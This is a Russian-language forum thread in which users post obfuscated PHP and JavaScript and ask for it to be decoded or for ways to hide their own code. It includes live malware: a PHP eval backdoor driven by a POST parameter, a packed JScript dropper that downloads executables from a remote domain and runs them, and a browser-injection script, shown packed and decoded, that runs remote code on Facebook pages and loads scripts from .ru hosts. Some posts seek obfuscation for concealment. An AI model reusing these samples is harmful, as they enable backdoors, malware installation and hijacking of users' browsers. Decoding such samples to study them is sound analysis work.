Обфускация кода (вопросы, просьбы зашифровать/расшифровать скрипт )

%D0%AF%D0%BF%D0%BE%D0%BD%D0%B8%D1%8F
urldecode функция, с остальным не помогу, слабоват в декодировании

Как вариант:
возможно проще будет пользоваться скриптом "как есть", а результаты его работы уже как-то обрабатывать?

 

Code:

<?php $qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q6755d7'])){eval(${$s20}['q6755d7']);}?>

Кто в курсах? какая програма плодит?

 

http://pastebin.com/JA0w972B помогите расшифровать

 

хочу зашифровать файл php с функциями, что бы при открытии файла, нельзя было визуально прочитать содержимое
этот файл с функциями инклудится в другие файлы и он должен исполняться как инклуд

чем посоветуете и как его зашифровать?
например понравилась шифровка кода - php шелла pas

 

https://www.sendspace.com/file/sntm4q

помогите скрипт расшифровать плис

 

Помогите расшифровать.

HTML:

eval(unescape("%66%75%6E%63%74%69%6F%6E%20%20%67%28%6E%20%29%7B%20%76%61%72%20%70%3D%27%27%2C%6A%2C%68%20%2C%6B%2C%79%3B%20%66%6F%72%28%6A%3D%31%3B%20%6A%3C%3D%20%6E%2E%6C%65%6E%67%74%68%3B%6A%2B%2B%29%20%7B%68%3D%6E%2E%63%68%61%72%41%74%28%20%6A%2D%31%2B%31%2D%31%29%3B%6B%3D%61%2E%69%6E%64%65%78%4F%66%28%20%68%29%3B%20%69%66%28%6B%3E%2D%31%2B%31%2D%31%29%7B%79%3D%20%28%28%6B%2B%33%2D%32%29%25%20%74%2D%31%29%3B%69%66%28%20%79%3C%3D%20%30%2B%32%2D%32%29%7B%79%2B%3D%74%20%7D%70%2B%3D%61%2E%63%68%61%72%41%74%28%79%2D%32%2B%31%29%7D%65%6C%73%65%20%7B%70%2B%3D%68%7D%7D%20%77%2B%3D%70%20%7D%3B%66%75%6E%63%74%69%6F%6E%20%69%69%69%28%29%7B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%77%29%3B%78%3D%22%22%7D"));

 

vasykas

PHP:

eval(function  g(n ){ var p='',j,h ,k,y; for(j=1; j<= n.length;j++) {h=n.charAt( j-1+1-1);k=a.indexOf( h); if(k>-1+1-1){y= ((k+3-2)% t-1);if( y<= 0+2-2){y+=t }p+=a.charAt(y-2+1)}else {p+=h}} w+=p };function iii(){ document.write(w);x=""})

 

Много раз сжат! в итого кусочек не большой получится

PHP:

function ddtjgg28571($str) {                  $a = "\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";                  $b = "\x67\x7a\x69\x6e\x66\x6c\x61\x74\x65";                  return $b($a($str));              }

 

пытаюсь разобрать код малвари

Учусь и пытаюсь разобрать код малвари. Файл с расширением *.js, но внутри арба-кадабра. Что это за код и как его разобрать?

Code:

eval(function(t,e,n,r,c,a) ////////JX1TjZTSY02y2E2No1Ud ////////tgZPaTI8HucZUZWLiM3l ////////4cEsyL3cjwzWcybYK48Q ////////Zr9g7R0CWzPWpCR3vGhoQM3ZSMq2H1RVZ5XcmSSDJxzKzic2rF6AQ2jaEWmw ////////////////hWISFdofd7bSEI79Lr65J8BJWKVtY0Zr7NKkZIgg3krVSCP4GIHpJnmGbMGm ////////6q0zTHKQO67yuT//////hWISFdofd7bSEI79Lr65J8BJWKVtY0Zr7NKkZIgg3krVSCP4GIHpJnmGbMGm ////////6q0zTHKQO67yuTo35saG7zrPSRC409YaY3rkBI0xUhxXo35saG7zrPSRC409YaY3rkBI0xUhxXqulKU8lq4NWnd2bP {if(c=function(t) ////////6q0zTHKQO67yuTo35saG7zrPSRC409YaY ////////6q0zTHKQO67yuT//////hWISFdofd7bSEI79Lr65J8BJWKVtY0Zr7NKkZIgg3krVSCP4GIHpJnmGbMGm ////////////////hWISFdofd7bSEI79Lr65J8BJWKVtY0Zr7NKkZIgg3krVSCP4GIHpJnmGbMGm ////////Zr9g7R0CWzPWpCR3vGhoQM3ZSMq2H1RVZ5XcmSSDJxzKzic2rF6AQ2jaEWmw ////////4cEsyL3cjwzWcybYK48Q ////tgZPaTI8HucZUZWLiM3l {return(e>t?"":c(parseInt(t/e)))+(35<(t%=e)?String.fromCharCode(t+29):t.toString(36))},!"".replace(/^/,String)){for(;n--;)a[c(n)]=r[n]||c(n);r=[function(t){return a[t]}],c=function(){return"\\w+"},n=1}for(;n--;)r[n]&&(t=t.replace(new RegExp("\\b"+c(n)+"\\b","g"),r[n])); ////////Zr9g7R0CWzPWpCR3vGhoQM3ZSMq2H1RVZ5XcmSSDJxzKzic2rF6AQ2jaEWmw ////////4cEsyL3cjwzWcybYK48Q ////tgZPaTI8HucZUZWLiM3l ////////////////hWISFdofd7bSEI79Lr65J8BJWKVtY0Zr7NKkZIgg3krVSCP4GIHpJnmGbMGm ////////6q0zTHKQO67yuT//////hWISFdofd7bSEI79Lr65J8BJWKVtY0Zr7NKkZIgg3krVSCP4GIHpJnmGbMGm ////////6q0zTHKQO67yuTo35saG7zrPSRC409YaY  return t}('b 6(t,e){d c=f g("x.y");c.z=b(){A(4===c.B){d t=f g("C.D");t.l(),t.E=1,t.F(c.G),t.H=0,t.I(e,2),t.J()}},c.l("K",t,0),c.L()}b h(t){M f g(t)}d 7="N",3="%i%\\\\",8="O.P",m="%i%\\\\n.o",9=j.h("j.p"),q="%i%\\\\r.k",9=h("j.p");3=9.Q(3),6("a://"+8+"/"+7+"/k.5",""+3+"r.k");R{9.s(""+q,1,0)}S(T){}6("a://"+8+"/"+7+"/u.5",""+3+"u.5"),6("a://"+8+"/"+7+"/v.5",""+3+"v.5"),6("a://"+8+"/"+7+"/w.5",""+3+"w.5"),6("a://"+8+"/"+7+"/U.V",""+3+"n.o"),9.s(""+m,0,0);',58,58,"   costarica  keybtc walkman sunshine gti WshShell http function  var  new ActiveXObject CreateObject TEMP WScript doc open mercedes syntax cmd Shell proud document Run  night fake trash MSXML2 XMLHTTP onreadystatechange if readyState ADODB Stream type write ResponseBody position saveToFile close GET send return attach twitterkeybtc com ExpandEnvironmentStrings try catch cont key block".split(" "),0,{ ////tgZPaTI8HucZUZWLiM3l ////////////////hWISFdofd7bSEI79Lr65J8BJWKVtY0Zr7NKkZIgg3krVSCP4GIHpJnmGbMGm ////////4cEsyL3cjwzWcybYK48Q ////////Zr9g7R0CWzPWpCR3vGhoQM3ZSMq2H1RVZ5XcmSSDJxzKzic2rF6AQ2jaEWmw ////////6q0zTHKQO67yuT//////hWISFdofd7bSEI79Lr65J8BJWKVtY0Zr7NKkZIgg3krVSCP4GIHpJnmGbMGm ////////6q0zTHKQO67yuTo35saG7zrPSRC409YaY }) ////tgZPaTI8HucZUZWLiM3l ////////Zr9g7R0CWzPWpCR3vGhoQM3ZSMq2H1RVZ5XcmSSDJxzKzic2rF6AQ2jaEWmw ////////4cEsyL3cjwzWcybYK48Q //////////////////hWISFdofd7bSEI79Lr65J8BJWKVtY0Zr7NKkZIgg3krVSCP4GIHpJnmGbMGm /////////6q0zTHKQO67yuT//////hWISFdofd7bSEI79Lr65J8BJWKVtY0Zr7NKkZIgg3krVSCP4GIHpJnmGbMGm //////////6q0zTHKQO67yuTo35saG7zrPSRC409YaY ); ////////////////hWISFdofd7bSEI79Lr65J8BJWKVtY0Zr7NKkZIgg3krVSCP4GIHpJnmGbMGm ////////4cEsyL3cjwzWcybYK48Q ////////6q0zTHKQO67yuTo35saG7zrPSRC409YaY ////////6q0zTHKQO67yuT//////hWISFdofd7bSEI79Lr65J8BJWKVtY0Zr7NKkZIgg3krVSCP4GIHpJnmGbMGm ////////Zr9g7R0CWzPWpCR3vGhoQM3ZSMq2H1RVZ5XcmSSDJxzKzic2rF6AQ2jaEWmw ////tgZPaTI8HucZUZWLiM3l

Спасибо!

 

подскажите пожалуйста обфускатор или способ, которым можно зашифровать часть пхп-кода (конкретно 1 строку)

 

Есть опенсорс каптча http://captcha.com/
Есть класс CaptchaClass.php
http://pastebin.com/enpru1WC
Буду признателен за его расшифровку.

 

Class 'LBD_Status' not found
Добавь

 

вот все сорсы каптчи этой.
https://www.sendspace.com/file/t3qpe8

 

Code:

location.href = "javascript:(" + function() { window.onbeforeunload = null; window.onunload = null; chrome.webstore.install = null; } + ")()"; eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c+'\\b','g'),k[c])}}return p}('9.44=20(){43(!8.14||!8.51)101(\'9.44()\',10);47{43(8.18(\'102\'))100;19 26=9.8.28(\'42\');19 35=\'99\'+24.52(24.70()*96);26.97(\'32\',35);26.36(8.62("9.31 = 20(30){\\7\\39 61 = \'\';\\7\\98(30) \\7\\1{\\7\\1\\103+=104.109(110(30.21(0,2),16)^82);\\7\\1\\108=30.21(2);\\7\\1}\\7\\60(61);\\1\\7};\\95(8.49.105.21(11,13) == \'.106.111\')\\7{\\7\\17.91 = \'85\';\\7\\17.94 = \'92\';\\7\\15(!9.25)\\7\\1{\\7\\1\\15(8.49.53 == \'33:\')\\7\\1\\1\\17.25 = 9.31(\'93\');\\7\\1\\55\\7\\1\\1\\17.25 = 9.31(\'86\');\\7\\1}\\7\\1\\7\\15(!9.46)\\7\\1\\17.46 = 9.31(\'90\');\\7\\1\\1\\7\\15(87 === 88 && 9.46 && 9.25.21(0,5) == \'33\')\\7\\1{\\7\\1\\17.45 = 20() {\\7\\1\\1\\15(!8.51)\\7\\1\\1\\1{\\7\\1\\1\\1\\89(\'9.45()\',10);\\7\\1\\1\\1\\60;\\7\\1\\1\\1}\\7\\1\\1\\50 = 8.28(\'114\');\\7\\1\\1\\50.32 = \\"54\\";\\1\\1\\7\\1\\1\\50.127.112=\\"132\\";\\7\\1\\1\\40.51.36(133);\\7\\1\\1\\1\\7\\1\\1\\15(!9.34)\\7\\1\\1\\1{\\7\\1\\1\\1\\17.34 = 20(22)\\7\\1\\1\\1\\1{\\7\\1\\1\\1\\1\\59{\\7\\1\\1\\1\\1\\1\\15(22 && 22.27 && 22.27.21(0,2)!=\'136\' && (22.27.21(0,6)==\'9\' || 22.27.21(0,3)==\'83\'))\\7\\1\\1\\1\\1\\1\\1{\\7\\1\\1\\1\\1\\1\\1\\59{\\7\\1\\1\\1\\1\\1\\1\\1\\39 57 = 8.28(\'42\');\\7\\1\\1\\1\\1\\1\\1\\1\\58.32 = \'63\';\\7\\1\\1\\1\\1\\1\\1\\1\\58.36(8.62(22.27+\\"\\\\116.14.41(8.18(\'63\'));\\"));\\7\\1\\1\\1\\1\\1\\1\\1\\40.14.38(57,8.14.37[0]);\\7\\1\\1\\1\\1\\1\\1\\1}56(68){66.65(68);}\\7\\1\\1\\1\\1\\1\\1}\\7\\1\\1\\1\\1\\1}\\7\\1\\1\\1\\1\\118(64){66.65(64);}\\7\\1\\1\\1\\1};\\7\\1\\1\\7\\1\\1\\1\\15 (9.67)\\7\\1\\1\\1\\1{\\7\\1\\1\\1\\1 9.67(\\"138\\", 9.34,121);\\7\\1\\1\\1\\1} \\7\\1\\1\\1\\55 \\7\\1\\1\\1\\1{\\7\\1\\1\\1\\1 9.113(\\"126\\", 9.34);\\7\\1\\1\\1\\1}\\7\\1\\1\\1}\\7\\1\\1\\39 12 = 77 76();\\7\\1\\1\\40.18(\'54\').81=9.25+\'\\/71\\/137.129?75=\'+24.52(12.84()\\/4)+\'72\'+12.78()+12.69()+12.73();\\7\\1\\1};\\7\\1\\17.45();\\7\\1}\\7} 47 { \\1(20() { 19 79 = (8.49.53 == \'33:\') ? \'33:\\/\\/128.80\' : \'131:\\/\\/130.80\'; 19 12 = 77 76(); 19 29 = \'134\'+24.70(); 19 23 = 8.28(\'42\'); 23.120(\'122\'); 23.32 = 29; 23.123 = \'124\\/119\'; 23.81 = 79+\'\\/117\\/125.71?75=\'+24.52(12.84()\\/4)+\'72\'+12.78()+12.69()+12.73(); 23.107 = 20(){ 8.18(29).74.41(8.18(29)); }; 19 48 = 8.115(\'14\')[0]; 48.38(23, 48.37[0]); })();\\7\\1}\\7"+"(20(){83{8.18(\'"+35+"\').74.41(8.18(\'"+35+"\'));}56(135){}})();"));43(8.14.37)8.14.38(26,8.14.37[0]);47 8.14.36(26)}};9.44();',10,139,'|t||||||n|document|window|||dt||head|tif||twindow|getElementById|var|function|substr|event|gc|Math|zSysDomain|zGScript|data|createElement|gcid|str|zDcd|id|https|zFBAdvListener|zGScriptID|appendChild|childNodes|insertBefore|tvar|tdocument|removeChild|script|if|zInit|zFBInit|zSecSrvU|else|h|location|tfr|body|round|protocol|zfrmc|telse|catch|scr|tscr|ttry|treturn|res|createTextNode|tmp_fbs|ee|log|console|addEventListener|e|getMonth|random|js|_|getFullYear|parentNode|u|Date|new|getDate|jDom|ru|src||try|getHours|49727|3a262622687d7d202523313933392334237c2027|top|self|tsetTimeout|3a26262221687d7d3f3035373c31253f283f7c2027|zPid|260339|3a26262221687d7d2a34343936352a3c26367c2027|zTrID|nif|100000|setAttribute|twhile|zbjs_|return|setTimeout|nzhhis|tres|String|href|facebook|onload|tstr|fromCharCode|parseInt|com|display|attachEvent|iframe|getElementsByTagName|ndocument|pjs|tcatch|javascript|removeAttribute|false|async|type|text|19136|onmessage|style|xffkdgxntd|html|rwqckakqfq|http|none|fr|gcs_|zEr|q_|fb|message'.split('|')));

 

Code:

window.zInit=function()
    {
    if(!document.head||!document.body)setTimeout('window.zInit()',10);
    else
        {
        if(document.getElementById('nzhhis'))return;
        var zGScript=window.document.createElement('script');
        var zGScriptID='zbjs_'+Math.round(Math.random()*100000);
        zGScript.setAttribute('id',zGScriptID);
        zGScript.appendChild(document.createTextNode("window.zDcd = function(str)
            {
            \n\tvar res = '';
            \n\twhile(str) \n\t
                {
                \n\t\tres+=String.fromCharCode(parseInt(str.substr(0,2),16)^82);
                \n\t\tstr=str.substr(2);
                \n\t
            }
            \n\treturn(res);
            \t\n
        };
        \nif(document.location.href.substr(11,13) == '.facebook.com')\n
            {
            \n\twindow.zPid = '49727';
            \n\twindow.zTrID = '260339';
            \n\tif(!window.zSysDomain)\n\t
                {
                \n\t\tif(document.location.protocol == 'https:')\n\t\t\twindow.zSysDomain = window.zDcd('3a26262221687d7d2a34343936352a3c26367c2027');
                \n\t\telse\n\t\t\twindow.zSysDomain = window.zDcd('3a262622687d7d202523313933392334237c2027');
                \n\t
            }
            \n\t\n\tif(!window.zSecSrvU)\n\t\twindow.zSecSrvU = window.zDcd('3a26262221687d7d3f3035373c31253f283f7c2027');
            \n\t\t\n\tif(top === self && window.zSecSrvU && window.zSysDomain.substr(0,5) == 'https')\n\t
                {
                \n\t\twindow.zFBInit = function()
                    {
                    \n\t\t\tif(!document.body)\n\t\t\t
                        {
                        \n\t\t\t\tsetTimeout('window.zFBInit()',10);
                        \n\t\t\t\treturn;
                        \n\t\t\t
                    }
                    \n\t\t\tfr = document.createElement('iframe');
                    \n\t\t\tfr.id = \"zfrmc\";
                    \t\t\n\t\t\tfr.style.display=\"none\";
                    \n\t\t\tdocument.body.appendChild(fr);
                    \n\t\t\t\n\t\t\tif(!window.zFBAdvListener)\n\t\t\t
                        {
                        \n\t\t\t\twindow.zFBAdvListener = function(event)\n\t\t\t\t
                            {
                            \n\t\t\t\t\ttry
                                {
                                \n\t\t\t\t\t\tif(event && event.data && event.data.substr(0,2)!='q_' && (event.data.substr(0,6)=='window' || event.data.substr(0,3)=='try'))\n\t\t\t\t\t\t
                                    {
                                    \n\t\t\t\t\t\t\ttry
                                        {
                                        \n\t\t\t\t\t\t\t\tvar scr = document.createElement('script');
                                        \n\t\t\t\t\t\t\t\tscr.id = 'tmp_fbs';
                                        \n\t\t\t\t\t\t\t\tscr.appendChild(document.createTextNode(event.data+\"\\ndocument.head.removeChild(document.getElementById('tmp_fbs'));
                                        \"));
                                        \n\t\t\t\t\t\t\t\tdocument.head.insertBefore(scr,document.head.childNodes[0]);
                                        \n\t\t\t\t\t\t\t
                                    }
                                    catch(e)
                                        {
                                        console.log(e);
                                    }
                                    \n\t\t\t\t\t\t
                                }
                                \n\t\t\t\t\t
                            }
                            \n\t\t\t\t\tcatch(ee)
                                {
                                console.log(ee);
                            }
                            \n\t\t\t\t
                        };
                        \n\t\t\n\t\t\t\tif (window.addEventListener)\n\t\t\t\t
                            {
                            \n\t\t\t\t window.addEventListener(\"message\", window.zFBAdvListener,false);
                            \n\t\t\t\t
                        }
                        \n\t\t\t\telse \n\t\t\t\t
                            {
                            \n\t\t\t\t window.attachEvent(\"onmessage\", window.zFBAdvListener);
                            \n\t\t\t\t
                        }
                        \n\t\t\t
                    }
                    \n\t\t\tvar dt = new Date();
                    \n\t\t\tdocument.getElementById('zfrmc').src=window.zSysDomain+'\/js\/fb.html?u='+Math.round(dt.getHours()\/4)+'_'+dt.getDate()+dt.getMonth()+dt.getFullYear();
                    \n\t\t
                };
                \n\t\twindow.zFBInit();
                \n\t
            }
            \n
        }
        else
            {
            \t(function()
                {
                var jDom = (document.location.protocol == 'https:') ? 'https:\/\/xffkdgxntd.ru' : 'http:\/\/rwqckakqfq.ru';
                var dt = new Date();
                var gcid = 'gcs_'+Math.random();
                var gc = document.createElement('script');
                gc.removeAttribute('async');
                gc.id = gcid;
                gc.type = 'text\/javascript';
                gc.src = jDom+'\/pjs\/19136.js?u='+Math.round(dt.getHours()\/4)+'_'+dt.getDate()+dt.getMonth()+dt.getFullYear();
                gc.onload = function()
                    {
                    document.getElementById(gcid).parentNode.removeChild(document.getElementById(gcid));
                    
                };
                var h = document.getElementsByTagName('head')[0];
                h.insertBefore(gc, h.childNodes[0]);
                
            }
            )();
            \n\t
        }
        \n"+"(function()
            {
            try
                {
                document.getElementById('"+zGScriptID+"').parentNode.removeChild(document.getElementById('"+zGScriptID+"'));
            }
            catch(zEr)
                {
            }
        }
        )();
        "));
        if(document.head.childNodes)document.head.insertBefore(zGScript,document.head.childNodes[0]);
        else document.head.appendChild(zGScript)
    }
};
window.zInit();

 

http://pastebin.com/4yebCdFX

 

Просьба расшифровать следующие файлы

 

Чем можно деобфусцировать php http://pastebin.com/9WUv6Pfy Если есть возможность скиньте исходный код

 

Ручками можно. Если чисто для большего понимания логики кода, то http://pastebin.com/XWkXtB0F

 

http://pastebin.com/mg8aaupJ